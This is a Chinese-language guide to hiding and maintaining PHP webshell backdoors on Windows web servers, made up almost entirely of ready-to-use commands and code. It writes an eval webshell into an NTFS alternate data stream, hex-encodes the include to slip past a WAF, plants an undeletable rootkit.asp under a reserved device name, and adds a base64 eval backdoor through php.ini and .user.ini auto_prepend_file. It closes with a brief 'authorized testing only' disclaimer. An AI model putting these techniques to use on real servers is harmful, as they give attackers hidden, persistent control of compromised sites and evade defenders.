NTFS文件系统隐蔽技术与PHP后门维持技巧

0x01 系统隐藏文件技术

文件属性隐藏

使用Windows attrib命令创建隐藏文件：

attrib +s +a +r +h 文件名
attrib +s +h 文件名

查看隐藏文件：

dir /a

0x02 NTFS ADS数据流技术

创建ADS隐藏文件

echo ^<?php @eval($_REQUEST[1]);?^> > index.php:shell.jpg

查看ADS文件

dir /r

编辑ADS文件

notepad index.php:shell.jpg

删除ADS文件

直接删除宿主文件即可：

del index.php

包含ADS文件

PHP代码中：

<?php include('index.php:shell.jpg'); ?>

绕过WAF检测

使用pack()函数进行十六进制编码：

<?php 
$a="696E6465782E7068703A7368656C6C2E6A7067"; // index.php:shell.jpg hex编码
$b="a";
include(PACK('H*',
$$
b));
?>

0x03 Windows保留文件名技术

创建无法删除的webshell

copy rootkit.asp \\.\D:\wwwroot\aux.test.asp

删除此类文件

del \\.\D:\wwwroot\aux.test.asp

Windows保留文件名列表：

aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9

0x04 PHP环境利用

include_path利用

1. 检查phpinfo()中include_path设置
2. 在指定路径创建目录（如C:\php\pear）
3. 放置木马文件
4. 直接包含即可

0x05 php.ini后门技术

直接修改php.ini

添加以下内容：

allow_url_include=On
auto_prepend_file="data:;base64,PD9waHAgQGV2YWwoJF9SRVFVRVNUW2NtZF0pOz8+"

（base64解码为：<?php @eval($_REQUEST[cmd]);?>）

使用死循环维持

<?php while(true){} ?>

.user.ini利用

创建.user.ini文件：

auto_prepend_file = 1.txt
user_ini.cache_ttl = 10  // 设置10秒自动加载

0x06 PHP扩展后门

安装方法

1. 下载对应系统的PHP后门扩展：

   • Linux版本：Linux_php_backdoor
   • Windows版本：windows_php_backdoor

2. 按照说明安装扩展

注意事项

1. 所有技术仅限授权测试使用
2. 部分技术需要管理员权限
3. 现代安全设备可能检测到部分技术
4. 实际使用需根据目标环境调整
5. 隐蔽性越高，对系统影响可能越大